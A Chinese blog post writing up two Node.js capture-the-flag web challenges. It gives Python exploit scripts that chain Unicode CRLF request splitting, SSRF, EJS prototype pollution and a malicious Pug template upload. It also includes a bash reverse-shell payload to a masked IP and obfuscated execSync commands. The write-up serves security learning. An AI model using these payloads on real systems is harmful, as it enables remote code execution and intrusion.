[西湖论剑 2022]real_ez_node 复盘

最新推荐文章于 2024-06-17 23:23:26 发布
最新推荐文章于 2024-06-17 23:23:26 发布
阅读量524 收藏 8
点赞数 10
分类专栏: CTF-WEB 文章标签: 安全 网络安全 node.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/135514917
版权

半年前说要学node 到现在还是b动静没有

[西湖论剑 2022]real_ez_node

给了源码 node8.1.2
初步看下来要ssrf打原型链污染
/路由下是this is ejs
可以往ejs的原型链污染去考虑

但是问题来了
上哪儿去ssrf
/curl路由只有参数q可控
在这里插入图片描述
考虑CRLF拆分攻击
在这里插入图片描述
污染点在
在这里插入图片描述
手动POST /copy
拿到数据包删掉点无关紧要的东西
然后就可以构造了
_tmp1;global.process.mainModule.require('child_process').exec('/bin/bash -c \\"/bin/bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/9000 0>&1\\"');var __tmp2

import urllib.parse
import requests

payload = '''HTTP/1.1

POST /copy HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Content-Length: 192

{"constructor.prototype.outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('/bin/bash -c \\"/bin/bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/9000 0>&1\\"');var __tmp2"}

GET /'''
payload = payload.replace(' ', '\u0120').replace('\n', '\u010d\u010a').replace('{', '\u017b').replace(
    '}', '\u017d').replace('"', '\u0122').replace('\'', '\u0127').replace('>', '\u013e').replace('\\', '\u015c')


payload = urllib.parse.quote(payload)

print(payload)
url = "http://node4.anna.nssctf.cn:28814/curl?q="
requests.get(url+payload)

[GYCTF2020]Node Game

这里顺便给[GYCTF2020]Node Game做了
在这里插入图片描述
模板是pug
/core可以ssrf
/file_upload有一个文件上传
根路径下传action参数可以访问任意模板

那么可以考虑上传一个恶意的pug然后根目录去访问
在这里插入图片描述
上传路径在uploads下 可以通过构造mimetype来路径穿越

先抓一个上传的包

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('ls')")
- return x

完事改脚本

import urllib.parse
import requests

# payload = '''HTTP/1.1

# POST /file_upload HTTP/1.1
# Host: 127.0.0.1:8081
# Content-Length: 331
# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCOrILUaqwgT7T9GT

# ------WebKitFormBoundaryCOrILUaqwgT7T9GT
# Content-Disposition: form-data; name="file"; filename="shell.pug"
# Content-Type: ../template

# -var x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat /flag.txt').toString()")
# -return x
# ------WebKitFormBoundaryCOrILUaqwgT7T9GT--

# GET /'''
payload ='''HTTP/1.1

POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Length: 301
Host: 127.0.0.1:8081

------WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Disposition: form-data; name="file"; filename="shell.pug"
Content-Type: ../template

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('ls')")
- return x
------WebKitFormBoundaryO9LPoNAg9lWRUItA--


GET /'''
payload = payload.replace(' ', '\u0120').replace('\n', '\u010d\u010a').replace('{', '\u017b').replace(
    '}', '\u017d').replace('"', '\u0122').replace('\'', '\u0127').replace('>', '\u013e').replace('\\', '\u015c')


payload = urllib.parse.quote(payload)


url = "http://4b5ed9ad-6e1e-4336-91a3-4bffc35ea376.node5.buuoj.cn:81/core?q="
print(url+payload)
res = requests.get(url+payload)
print(res.text)

此时访问/?action=shell
在这里插入图片描述
修改pug

- x = eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat f*')")
- return x

在这里插入图片描述

丨Arcueid丨
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NSS [西湖论剑 2022]real_ez_node
Jay17的博客
09-16 564
NSS [西湖论剑 2022]real_ez_node
西湖论剑 2022复现
weixin_63231007的博客
03-03 1068
[西湖论剑 2022] Node Magical Login & [西湖论剑 2022] real_ez_node & [西湖论剑 2022] 扭转乾坤 & [西湖论剑 2022] unusual php
2022西湖论剑 部分wp
qq_61768489的博客
02-05 1212
拿到文件路径/usr/local/lib/php/extensions/no-debug-non-zts-20190902/zend_test.so。可以考虑用SSRF来绕过)读取 /proc/self/maps 查看当前进程的内存映射关系,发现加载了一个名为zend_test的扩展。参考此文https://xz.aliyun.com/t/9707#toc-11。提取出来,黑白像素转01二进制,注意要竖着跑 ,像素太多,我将结果保存到文件里。总之php文件被加密了,寻找加密猜测应该是有依赖,思路可以是读。
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3232
2023西湖论剑初赛CTF部分wp
[西湖论剑 2022]real_ez_node
rev1ve的博客
11-11 463
存在 Unicode 字符损坏导致的 HTTP 拆分攻击,(Node.js10中被修复),当 Node.js 使用 http.get (关键函数)向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击。补充说明:CRLF指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a)时,path被分成两部分,props数组如下。
PHP函数addslashes和mysql_real_escape_string的区别
10-26
主要介绍了PHP函数addslashes和mysql_real_escape_string的区别,以及一个SQL注入漏洞介绍,需要的朋友可以参考下
rtc.rar_For Real_real time clock
09-24
Real TIme Clock for 89c51
FFT.ZIP_Real_The Dos
09-20
This release has better threading support, faster real-data transforms, faster transforms for non-power-of-two sizes with factors of 5 and 10, and support for Cell processors (see the FFTW for Cell ...
RTX_Blinky.zip_For Real_RTX
09-24
real time OS RTX program for blinky.
RTC.rar_For Real_RTC
09-24
This program works for 8051 based MCU. Its for controlling devices with reference to the data fetched by the processor from the real time clock IC.
西湖论剑 2023 比赛复现
shinygod的博客
02-11 1371
在copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有__proto__。在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代__proto__,最后打ejs就行了。
刷题记录(2023.3.6 - 2023.3.11)
Pai_Space
03-11 1281
刷题记录(2023.3.6 - 2023.3.11)
西湖论剑初赛web wp
akxnxbshai的博客
02-12 851
西湖论剑web部分wp
[VNCTF 2021]realezjvav 复现
SopRomeo的博客
03-19 785
发现是springboot框架写的 测试sql注入 发现注入点在password这里 典型的盲注 发现不能布尔盲注,试试时间盲注 发现有过滤 为1714的都是被过滤的 盲注的两个sleep和benchmark都被过滤了 搜一波 绕过讲解 发现能用那个笛卡尔积绕过 payload username=1&password=-1' or if((ascii(substr((select database()),1,1))>200),1,(SELECT count(*) FROM infor.
数字时代网络安全即服务的兴起
网络研究观
06-11 595
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 117
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 500
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1472
Windows安全基线检查标准,Windows加固方式
NTFS安全权限
2302_80097039的博客
06-12 770
NTFS权限是基于。
REAL_TO_DINT
03-14
REAL_TO_DINT是一种在PLC编程中常用的函数或指令,用于将实数(浮点数)转换为整数(整型)。该函数可以将一个实数值转换为最接近的整数值,并将结果存储在一个整型变量中。 在PLC编程中,REAL_TO_DINT函数通常用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值